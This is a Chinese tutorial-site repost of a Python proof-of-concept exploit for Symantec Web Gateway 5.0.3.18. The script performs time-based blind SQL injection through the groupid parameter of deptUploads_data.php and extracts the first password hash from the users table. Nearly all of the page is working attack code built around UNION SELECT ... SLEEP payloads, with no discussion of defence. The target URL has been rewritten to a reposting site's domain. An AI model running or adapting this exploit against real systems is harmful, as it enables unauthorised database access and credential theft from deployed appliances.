网站地图    收藏   

主页 > 后端 > 网站安全 >

Symantec Web Gateway 5.0.3.18 (deptUploads_data.php groupid

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] #!/usr/bin/python# @_Kc57# Blind SQLi POC# Dumps out the first available hash in the users table of spywall_dbimport urllibimport timefrom time import sleeptiming=#39;2.5#39......

#!/usr/bin/python
# @_Kc57
# Blind SQLi POC
# Dumps out the first available hash in the users table of spywall_db
 
import urllib
import time
from time import sleep
 
timing='2.5'
checks = 0
 
def check_char(i, pos):
       global timimg
       global checks
       checks += 1
       url = 'https:// www.2cto.com /spywall/includes/deptUploads_data.php?groupid=1 union select 1,2, IF (%s=conv(mid((select password from users),%s,1),16,10),SLEEP(%s),null);--' % (i,pos,timing)
       start = time.time()
       urllib.urlopen(url)
       end = time.time()
       howlong = end-start
       return howlong
 
def check_pos(pos):
 
       for m in range(0,16):
              output = check_char(m, pos)
              print "[*] Character %s - Took %s seconds" % (hex(m)[2:],output)
              if output > 2:
                     return hex(m)[2:]
                    
 
md5 = ''
start = time.time()
for y in range(1,33):
       print "Checking position %s" % (y)
       md5 += check_pos(y)
       print md5
       end = time.time()
       howlong = end-start
 
print "1st hash:%s" % (md5)
print "Found in %s queries" % (checks)
print "Found in %s" %(howlong)

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论